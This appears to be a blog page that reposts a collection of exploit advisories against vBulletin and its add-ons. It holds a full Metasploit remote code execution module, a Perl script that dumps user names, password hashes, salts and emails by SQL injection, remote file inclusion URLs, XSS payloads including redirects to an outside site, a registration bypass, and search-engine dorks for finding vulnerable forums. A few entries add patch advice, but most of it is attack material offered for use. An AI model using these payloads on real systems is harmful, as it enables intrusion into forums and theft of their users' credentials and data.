Cold Zero/vBulletin vBGSiteMap 2.41 (root) Remote File Inclusion Vulnerabilities

Código:
=============================================
 
vBulletin Google Site Map Creator (base) Remote File Include Vulnerability
 
=============================================
Found by : Host4vb.com & Cold z3ro
Contact : Admin@host4vb.com , Cold-z3ro@hotmail.com
Homepage : Host4vb.com , Hack-Teach.Org
=============================================
Script : http://forum.time2dine.co.nz/seo-vbulletin/vbulletin-google-site-map-3976.html
=============================================
File :
/vbgsitemap-vbseo.php  <=  Line 5
require $base."includes/functions_vbseo.php";
=============================================
File :
/vbgsitemap-config.php <= Line 139
require $base."includes/config.php";
=============================================
Exploit :
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-config.php?base=Evil-Script?
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-vbseo.php?base=Evil-Script?
==============================================
Greets To : Xp10.com , Hack-Teach Members , All Arabs Hosting , Sniper-sa.com , sm4host.com
Thanx: Mohandko , Alkomandoz Hacker , Mogatil , The Viper , The Wolf Ksa , Dr.Exe , Pro Hackers
Thanx: Green eyas amor , Titanichacker , hacaaar , Hack Back , Mohammad Sallah , Unix Hacker
       RoMaNcYxHaCkEr , mR wEsAm X , Mr.E-vil
Thanx: Team Hell Members (ConviCt & jEdDaWi & Black Shell & Hackers Cool & Dr.killer & Red Hat)
 
# milw0rm.com [2007-05-25]
metasploit/vBulletin misc.php Template Name Arbitrary Code Execution


Código:
##
# $Id: php_vbulletin_template.rb 9929 2010-07-25 21:37:54Z jduck $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    # XXX This module needs an overhaul
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'vBulletin misc.php Template Name Arbitrary Code Execution',
            'Description'    => %q{
                    This module exploits an arbitrary PHP code execution flaw in
                the vBulletin web forum software. This vulnerability is only
                present when the "Add Template Name in HTML Comments" option
                is enabled. All versions of vBulletin prior to 3.0.7 are
                affected.
            },
            'Author'         =>
                [
                    'str0ke <str0ke[at]milw0rm.com>',
                    'cazz'
                ],
            'License'        => BSD_LICENSE,
            'Version'        => '$Revision: 9929 $',
            'References'     =>
                [
                    [ 'CVE', '2005-0511' ],
                    [ 'BID', '12622' ],
                    [ 'OSVDB', '14047' ],
                ],
            'Privileged'     => false,
            'Platform'       => ['unix', 'solaris'],
            'Payload'        =>
                {
                    'Space'       => 512,
                    'DisableNops' => true,
                    'Keys'        => ['cmd', 'cmd_bash'],
                },
            'Targets'        => [ ['Automatic', { }], ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Feb 25 2005'
            ))
 
        register_options(
            [
                OptString.new('PATH', [ true,  "Path to misc.php", '/forum/misc.php']),
            ], self.class)
 
        deregister_options(
            'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
        )
    end
 
    def go(command)
        wrapper = rand_text_alphanumeric(rand(128)+32)
 
        command = "echo #{wrapper};#{command};echo #{wrapper};"
        encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
 
        res = send_request_cgi({
                'uri'      => datastore['PATH'],
                'method'   => 'GET',
                'vars_get' =>
                    {
                        'do' => "page",
                        'template' => "{${passthru(#{encoded})}}"
                    }
            }, 5)
 
        if (res and res.body)
            b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
            if b
                return b.captures[0]
            elsif datastore['HTTP::chunked'] == true
                b = /chunked Transfer-Encoding forbidden/.match(res.body)
                if b
                    raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
                end
            end
        end
 
        return nil
    end
 
    def check
        response = go("echo ownable")
        if (!response.nil? and response =~ /ownable/sm)
            return Exploit::CheckCode::Vulnerable
        end
        return Exploit::CheckCode::Safe
    end
 
    def exploit
        response = go(payload.encoded)
        if response == nil
            print_error('exploit failed: no response')
        else
            if response.length == 0
                print_status('exploit successful')
            else
                print_status("Command returned #{response}")
            end
            handler
        end
    end
end
Net.Edit0r/Point Market System 3.1x vbulletin plugin SQLi Vulnerability 

Código:
#(+)Exploit Title: Point Market System 3.1x vbulletin plugin SQL
Injection Vulnerability
#(+)Author   : Net.Edit0r
#(+) E-mail  : Black.hat.tm@Gmail.com
#(+) dork    : intext:Point Market System 3.1x
#(+) Versian : [3.1x]
#(+) Category : Web Apps [SQl]
#(+) Platform : Tested on: linux
#(+) Download plugin : http://www.megaupload.com/?d=2R592KO0
 
____________________________________________________________________
____________________________________________________________________
 
You must register on the site !
 
The security problem in the file "market.Php" has been created. You
can disable this security problem Plagn take it away.
 
[~] Vulnerable File :
 
#      [+]http://localhost.com/market.php?do=cat&id=[SQL]
 
[~] SQL injection Vulnerability
     
#      [+]-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--
 
#      [+]http://localhost.com/market.php?do=cat&id=-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--
 
[~] Demo Vedio :
 
Vedio : http://www.multiupload.com/S28Z2FCZQD
 
[~] Full Info plugin Point Market
 
http://www.vbulletin.org/forum/showthread.php?p=2159503#post2159503
 
____________________________________________________________________
____________________________________________________________________
 
########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &
3H34N & D3adly #BHG
(+)Sp My Best Friend : HUrr!c4nE ~ b3hz4d ~ Virangar ~ S3cR3T ~ M4hd1
~ Mikili ~ P0W3RFU7 ~  Ali.Erroor and all Friends
(+)Gr33ts to : All Iranian HackerZ
########################################################################
H-SK33PY/vBulletin 3.8.6 faq.php Information Disclosure 

Código:
010101010101010101010101010101010101010101010101010101010   
   0                                                       0
   1  Iranian Datacoders Security Team 2010
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
 
# Original Advisory: http://forum.intern0t.net/exploits-vulnerabilities-pocs/2857-vbulletin-3-8-6-critical-information-disclosure.html
# Reference: http://www.securityfocus.com/archive/1/512575/30/0/threaded
 
# Exploit Title: vBulletin 3.8.6 faq.php Vulnerability                  
# Date: 24/07/2010                            
# Author: H-SK33PY                     
# Software Link: http://www.vbulletin.com/
# Version: 3.8.6
# Google dork : powered by vBulletin 3.8.6
# Platform / Tested on: linux
# Category: webapplications
# Code : N/A
 
#BUG:#########################################################################
 
Is perhaps one or the other known, but I find that really interesting that a great and mighty forum software like vBulletin can undermine the mistake that the MySQL password for any person to be visible.
 
The issue has been published this afternoon and vBulletin responded with a patch on it.
 
The faq.php was only indirectly affected, and serves more as an "issue" because an error was partly responsible for the phrases.
 
Where are the gaps?
 
Let's look at the /install/vbulletin-language.xml file and search for "database_ingo" - what we find? Ah interesting:
 
##################################################################################################
<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Database Name: {$vbulletin->config['Database']['dbname']}<br />
Database Host: {$vbulletin->config['MasterServer']['servername']}<br />
Database Port: {$vbulletin->config['MasterServer']['port']}<br />
Database Username: {$vbulletin->config['MasterServer']['username']}<br />
Database Password: {$vbulletin->config['MasterServer']['password']}]]></phrase>
##################################################################################################
 
How do I use this from now?
We look for a forum, which is affected by this vulnerability, click above on "Help" / "FAQ", enter in "search terms" or "Search Word (s):" then "Database"
(or database) and a then see, aha, first hit:
 
##################################################################################################
 
Datenbank-Name: XXXXXXXXX
 
Datenbank-Server: localhost
 
Datenbank-Port: 3306
 
Datenbank-Benutzername: root
 
Datenbank-Kennwort: my4moo
##################################################################################################
 
 
Respectively English beeen at a board:
 
##################################################################################################
Database Name: pro_aXXXXXXXXXg_com
 
Database Host: localhost
 
Database Port: 3306
 
Database Username: pro_aXXXXXXXXXg
 
Database Password: gitl0st
##################################################################################################
 
On what to do with it, I think I need not dwell on it.
 
How do I protect myself?
As already posted a patch from the official vBulletin site, or by a MySQL query:
 
##################################################################################################
DELETE FROM `vb_phrase` WHERE `varname`='database_ingo'
 
 
##################################################################################################
##################################################################################################
##################################################################################################
 
#############################################################################
Our Website : http://www.datacoders.ir
 
Special Thanks to : ccC0d3rZzz &amp;  all iranian datacoders members
 
#############################################################################
vBulletin version 3.8.6 suffers from an information disclosure vulnerability in faq.php.

MaXe/vBulletin 4.0.8 PL1 Cross Site Scripting Filter Bypass 

Código:
vBulletin - XSS Filter Bypass within Profile Customization
 
 
Versions Affected: 4.0.8 PL1 (3.8.* is not vulnerable.)
 
Info:
Content publishing, search, security, and more - vBulletin has it all.
Whether it's available features, support, or ease-of-use, vBulletin offers
the most for your money. Learn more about what makes vBulletin the
choice for people who are serious about creating thriving online communities.
 
External Links:
http://www.vbulletin.com
 
Credits: MaXe (@InterN0T)
 
 
-:: The Advisory ::-
vBulletin is prone to a Persistent Cross Site Scripting vulnerability within the
Profile Customization feature. If this feature is not enabled the vulnerability
does not exist and the installation of vBulletin is thereby secure.
 
Within the profile customization fields, it is possible to enter colour codes,
rgb codes and even images. The image url() function does not sanitize user
input in a sufficient way causing vBulletin to be vulnerable to XSS attacks.
 
With the previous patch for vBulletin 4.0.8 PL1, most attacks were disabled
however it is possible to bypass this filter and inject data which is then executed
effectively against though not limited to Internet Explorer 6.
 
Proof of Concept:
url(vbscript:msgbox("X/SS"))
 
 
-:: Solution ::-
Update vBulletin to version: 4.0.8 PL2
 
 
Disclosure Information:
- Vulnerability found and researched: 18th November 2010
- Disclosed to vendor (Internet Brands): 18th November
- Patch from Vendor available: 19th November
- Disclosed at: InterN0T, Full Disclosure, Bugtraq and Exploit: 20th November
 
 
References:
http://forum.intern0t.net/intern0t-advisories/3398-vbulletin-4-0-8-pl1-cross-site-scripting-filter-bypass-within-profile-customization.html
http://forum.intern0t.net/intern0t-advisories/3349-vbulletin-4-0-8-persistent-cross-site-scripting-via-profile-customization.html
vBulletin version 4.0.8 PL1 suffers from a cross site scripting filter bypass vulnerability.

Immortal Boy/vBulletin 3.8.4 / 3.8.5 Registration Bypass

Código:
===============================================================
vBulletin 3.8.4 &amp; 3.8.5 Registration Bypass Vulnerability
===============================================================
 
 
   010101010101010101010101010101010101010101010101010101010  
   0                                                       0
   1  Iranian Datacoders Security Team 2010                1
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
 
 
# Exploit Title: vBulletin 3.8.4 &amp; 3.8.5 Around Registration Vulnerability
# Date: 29/08/2010                           
# Author: Immortal Boy                    
# Software Link: http://www.vbulletin.org
# Version: 3.8.4 &amp; 3.8.5
# Google dork 1 : powered by vBulletin 3.8.4
# Google dork 2 : powered by vBulletin 3.8.5
# Platform / Tested on: Multiple
# Category: webapplications
# Code : N/A
 
#  BUG :  #########################################################################
 
1 > Go to Http://[localhost]/path/register.php
 
2 > Assume that forum admin user name is ADMIN
 
3 > Type this at User Name ===> ADMIN&amp;#00
 
4 > &amp;#00 is an ASCII Code
 
5 > And complete the other parameters
 
6 > Then click on Complete Registrarion
 
7 > Now you see that your user name like admin user name
 
After this time the private messages to the user (ADMIN) to sending see for you is sending .
 
 
#  Patch :  #######################################################################
 
1 > Go to AdminCP
 
2 > Click on vBulletin Options and choose vBulletin Options
 
3 > Choose Censorship Options
 
4 > type &amp;# in Censored Words section
 
5 > Then click on Save
 
#############################################################################
 
Our Website : http://www.datacoders.ir
 
Special Thanks to : H-SK33PY , NEO , Sp|R|T , BigB4NG , 3r1ck , Dr.mute ,
 
hosinn , NIK , uones , mohammad_ir &amp;  all iranian datacoders members
 
#############################################################################
vBulletin versions 3.8.4 and 3.8.5 suffer from a registration bypass vulnerability.

X-h4ck/vBulletin CMS 4.1.1 Recent Articles Cross Site Scripting 

Código:
============================================================
vBulletin 4 CMS Recent Articles widget XSS Vulnerability 
============================================================
 
#~ Title         : vBulletin 4 CMS Recent Articles widget XSS Vulnerability  
#~ Software      : http://www.vbulletin.com
#~ Tested on     : version 4.1.1
#~ Date          : 30/06/2011
#~ Discovered by : X-h4ck
#~ Site          : http://www.pirate.al/ #PirateAL Crew , http://theflashcrew.blogspot.com/ 
#~ Email         : mem001@live.com 
#~ Greetz        : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon
@ vBulletin 4 CMS Package..
 
~ You'll need to create a new article at The Front Page.
# Article Title : NONE
# Article Content : "><script>alert('XSS');</script> , or some other cheats : 
"><iframe SRC="http://www.pirate.al/forum/forum.php" height = ?100%? width =?100%?>
">"">><meta http-equiv="Refresh" content="0;url=http://www.pirate.al/">"">
 
Now Post the Article &amp; check the Front Page ( HOME ) (http://localhost/vbulletin/content.php) , and you will get an " xss " alert , enjoy .
Video : http://www.youtube.com/watch?v=seuT92R6j-Y
 
 
+++++++++++++++++++++++++++++++++++++++++++++
# // Aint no pussy made where we came from \\
+++++++++++++++++++++++++++++++++++++++++++++
vBulletin CMS version 4.1.1 with the Recent Articles widget suffers from a cross site scripting vulnerability.

Mr.ThieF/vBulletin 3.x vBExperience Cross Site Scripting 

Código:
[~] Author : Mr.ThieF <~
 
[~] Contact : Mr.ThieF@yahoo.com <~
 
[~] DorK : inurl:xperience.php
 
[~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=171014
 
[~] Version : 3.x.x
 
[~] Exploit :
 
http://[site]/[path]/xperience.php?sortfield=xr&amp;sortorder="><s cript>alert(1);</s cript>
 
Example : http://www.worldwide-invest.org/xperience.php?sortfield=xr&amp;sortorder="><s cript>alert(1);</s cript>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
GreeTz : RENO <3 - x-CoD3r <3 - T3rr0risT_07 <3 -Snip3r_www - ALL My FrindS <3
vBulletin version 3.x.x with the vBExperience add-on suffers from a cross site scripting vulnerability.

d3v1l/vBulletin vBShout 6.0.5 Cross Site Scripting 

Código:
###############################################################################################################
 
 
#  Title: vBulletin vBShout Module <= 6.0.5 (vbshout.php?message=) -
Reflected Cross-Site Scripting ( XSS )
 
#  Note:  HTML Injection and Redirect works too
 
#  Script Page : http://www.dragonbyte-tech.com
 
#  Date: 24-03-2012
 
#  Author : Avram Marius Gabriel (d3v1l)
 
#  RandomStorm  - http://www.randomstorm.com
 
#  Tested on: Windows XP &amp; Vista
 
 
###############################################################################################################
 
 
#  The last version of vBulletin vBShout Module suffers from Cross-Site
Scripting and HTML Injection
   The issue is located in Shoutbox Search Archive
 
#  POC:
 
#  http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img
src=1
onerror=alert("XSS")>&amp;username=&amp;hours=&amp;from[month]=0&amp;from[day]=&amp;from[year]
=0&amp;end[month]=0&amp;end[day]=&amp;end[year]=0&amp;chatroomid=0&amp;orderby=DESC&amp;perpage=5&amp;s=&amp;do=archive&amp;instanceid=1
 
 
#  http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img
src=1 onerror=alert("XSS")>&amp;s=&amp;do=archive&amp;instanceid=1
 
 
################################################################################################################
 
 
 
# vBShout is the ideal way to keep members on your forum while they wait
for replies to their posts.
  It can be used in many ways - as a chat room for members, for staff to
discuss issues in realtime,
  as a live-update feed of new posts and threads, as a way to track member
milestones
 
################################################################################################################
 
-- 
Check My Blog <http://security-sh3ll.blogspot.com> or Follow me on
Twitter<http://twitter.com/securityshell>
vBulletin vBShout module versions 6.0.5 and below suffer from a cross site scripting vulnerability.

DSecurity/EggAvatar For vBulletin 3.8.x SQL Injection 

Código Perl:
#!/usr/bin/env perl use LWP::UserAgentsub banner{
print 
"###################################\n";
print 
"############ DSecurity ############\n";
print 
"###################################\n";
print 
"# Email:dsecurity.vn[at]gmail.com #\n";
print 
"###################################\n";
}
if(@
ARGV<5){
    print 
"Usage: $0 address username password number_user sleeptime\n";
    print 
"Example: $0 http://localhost/vbb test test 10 10\n";
    exit();
$ua=LWP::UserAgent->new(); $ua->agent("DSecurity"); $ua->cookie_jar({}); sub login(@){
    
my $username=shift;
    
my $password=shift;
    
my $req HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login');
    
$req->content_type('application/x-www-form-urlencoded');
    
$req->content("vb_login_username=$username&amp;vb_login_passwor=$password&amp;s=&amp;securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&amp;do=login&amp;vb_login_md5password=&amp;vb_login_md5password_utf=");
    
my $res $ua->request($req);
sub v_request{
    
#Declare
    
$print $_[0];
    
$select $_[1];
    
$from $_[2];
    
$where $_[3];
    
$limit $_[4];
    
$sleep $ARGV[4];
    if (
$from eq '') {$from 'information_schema.tables';}
    if (
$where eq '') {$where '1';}
    if (
$limit eq '') {$limit '0';}
    if (
$sleep eq '') {$sleep '10';}

    
# Create a request
    
my $req HTTP::Request->new(POST => $ARGV[0].'/eggavatar.php');
    
$req->content_type('application/x-www-form-urlencoded');
    
$req->content('do=addegg&amp;securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&amp;eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select  from  $from  WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&amp;uid=1&amp;pid=1");
    
# Pass request to the user agent and get a response back
    
my $res $ua->request($req);
    
#print $res->content;
    
if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
        {
$test = $3};
    
sleep($sleep);
    return 
$print.$test."\n";
}
&
amp;banner;
print 
"\n#############################################################################################################\n";
print 
"# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability                                                 #\n";
print 
"# Date:06-03-2011                                                                                           #\n";
print 
"# Author: DSecurity                                                                      #\n";
print 
"# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";
print 
"# Version: 2.3.2                                                                                            #\n";
print 
"# Tested on: vBulletin 3.8.0                                                                                #\n";
print 
"#############################################################################################################\n";
  
#login login($ARGV[1],$ARGV[2]); #Foot print print v_request('MySQL version: ','@@version');
print 
v_request('Data dir: ','@@datadir');
print 
v_request('User: ','user()');
print 
v_request('Database: ','database()');  #Get user for($i=1;$i<=$ARGV[3];$i++){
    print 
"-----------------------------------------\n";
    print 
$id v_request('ID: ','userid','user','1',$i-1);
    if(
$id =~ /(ID:)s(.*)/){
        print 
v_request('Group: ','usergroupid','user','userid='.$2);
        print 
v_request('Username: ','username','user','userid='.$2);
        print 
v_request('Password: ','password','user','userid='.$2);
        print 
v_request('Salt: ','salt','user','userid='.$2);
        print 
v_request('Email: ','email','user','userid='.$2);
    }

}  
EggAvatar for vBulletin version 3.8.x suffers from a remote SQL injection vulnerability.

indoushka/vBulletin 4.1.7 Beta 1 Remote File Inclusion

Código:
====================================================
vBulletin® Version 4.1.7 Beta 1 Mullti Vulnerability 
====================================================
 
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0    .    .--.   .--.   .---.      .                  1
1  .'|        )      )      /      |                  0
0    |     --:    --:      /    .-.| .-.  .  .        1
1    |        )      )    /    (   |(   ) |  |        0
0  '---'  `--'   `--'    '      `-'`-`-'`-`--|        1
1                                            ;        0
0     Site            : 1337day.com        `-'        1
1     Support e-mail  : submit[at]inj3ct0r.com        0
0     >> Exploit database separated by exploit        1 
1           type (local, remote, DoS, etc.)           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1
 
#######################################################
 
           # Vendor: noLogging by SCRiPTZSECTOR.ORG 
 
                 # Date: 2011-07-27 
 
                # Author : indoushka 
 
            +++=[ Dz Offenders Cr3w ]=+++
 
         # KedAns-Dz * Caddy-Dz * Kalashinkov3
 
      # Jago-dz * Kha&amp;miX * T0xic * Ev!LsCr!pT_Dz 
 
           # Contact : ind0ushka@hotmail.com
 
     # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr
 
########################################################################  
 
# Exploit By indoushka 
-------------
 
Powered by vBulletin® Version 4.1.7 Beta 1
 
RFI :
Function: include    File: api.php            Line: 139
Exploit: http://localhost/vB1/api.php?api_script=[EV!L]
 
##################################################
 
Function: include    File: api.php            Line: 139
Exploit: http://localhost/vB1/api.php?api_script=[EV!L]
 
##################################################
 
Function: require_once    File: payment_gateway.php            Line: 3
Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L]
 
##################################################
 
Function: require_once    File: payment_gateway.php            Line: 3
Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L]
 
##################################################
 
Function: include_once    File: cronadmin.php            Line: 4
Exploit: http://localhost/vB1/admincp/cronadmin.php?nextitem[filename]=[EV!L]
 
##################################################
 
Function: include    File: diagnostic.php            Line: 12
Exploit: http://localhost/vB1/admincp/diagnostic.php?match[0]=[EV!L]
 
##################################################
 
Function: require_once    File: diagnostic.php            Line: 18
Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L]
 
##################################################
 
Function: require_once    File: diagnostic.php            Line: 18
Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L]
 
##################################################
 
Function: include_once    File: plugin.php            Line: 22
Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L]
 
##################################################
 
Function: include_once    File: plugin.php            Line: 22
Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L]
 
##################################################
 
Function: include_once    File: class_block.php            Line: 14
Exploit: http://localhost/vB1/includes/class_block.php?file=[EV!L]
 
##################################################
 
Function: require_once    File: class_humanverify.php            Line: 2
Exploit: http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L]
 
##################################################
 
Function: require_once    File: class_humanverify.php            Line: 2
Exploit: http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L]
 
##################################################
 
Function: require_once    File: class_paid_subscription.php            Line: 24
Exploit: http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L]
 
##################################################
 
Function: require_once    File: class_paid_subscription.php            Line: 24
Exploit: http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L]
 
##################################################
 
Function: require_once    File: functions.php            Line: 6
Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L]
 
##################################################
 
Function: require_once    File: functions.php            Line: 6
Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L]
 
##################################################
 
Function: include_once    File: functions_cron.php            Line: 8
Exploit: http://localhost/vB1/includes/functions_cron.php?nextitem[filename]=[EV!L]
 
##################################################
 
Function: require    File: vb.php            Line: 7
Exploit: http://localhost/vB1/vb/vb.php?filename=[EV!L]
 
##################################################
 
Function: require_once    File: class_upgrade.php            Line: 48
Exploit: http://localhost/vB1/install/includes/class_upgrade.php?chosenlib=[EV!L]
 
##################################################
 
Function: require_once    File: class_upgrade.php            Line: 48
Exploit: http://localhost/vB1/install/includes/class_upgrade.php?chosenlib=[EV!L]
 
##################################################
 
Function: include_once    File: attach.php            Line: 80
Exploit: http://localhost/vB1/packages/vbattach/attach.php?package=[EV!L]
 
##################################################
 
Function: include_once    File: attach.php            Line: 604
Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]
 
##################################################
 
Function: include_once    File: attach.php            Line: 1222
Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]
 
##################################################
 
Directory Listing ckeditor :
 
http://localhost/vB1/clientscript/ckeditor/
 
Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------
vBulletin version 4.1.7 Beta 1 suffers from multiple remote file inclusion vulnerabilities.

c0d3_z3r0/vBulletin vbBux/vbPlaza Blind SQL Injection

Código:
--==+======================================================================================================================+==--
--==+                  vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability                +==--
--==+======================================================================================================================+==--
 
AUTHOR: Cold z3ro &amp; Crck_Man
SITE: www.vbPlaza.com
DORK: inurl:"vbplaza.php?do=*"
 
DESCRIPTION: Blind SQL Injection in name of vbplaza.php a mod for vBulletin, able to retrieve admin hash
 
EXPLOIT: 
http://www.site.com/forum/vbplaza.ph...nk&#39;/**/and 58<ascii(substring((SELECT concat(password,0x3a,username) from user limit 0,1),33,1))/*
 
IE: ascii encodes
  58  => :
  48  => 0
  120 => x
 
NOTE: You'll need to be logged into the forum to exploit vbplaza.php. Increment the limit to get the next admin .
 
 
Copyrights : www.hackteach.org , www.h-t.cc
 
Greetz : www.hackteach.[org/net] , www.islam-attack.com , www.s3curi7y.com , www.xp10.biz , Friends
vBulletin vbBux/vbPlaza versions 2.x and below suffer from a remote blind SQL injection vulnerability in vbplaza.php.

Nenhum comentário:

Postar um comentário

Related Posts Plugin for WordPress, Blogger...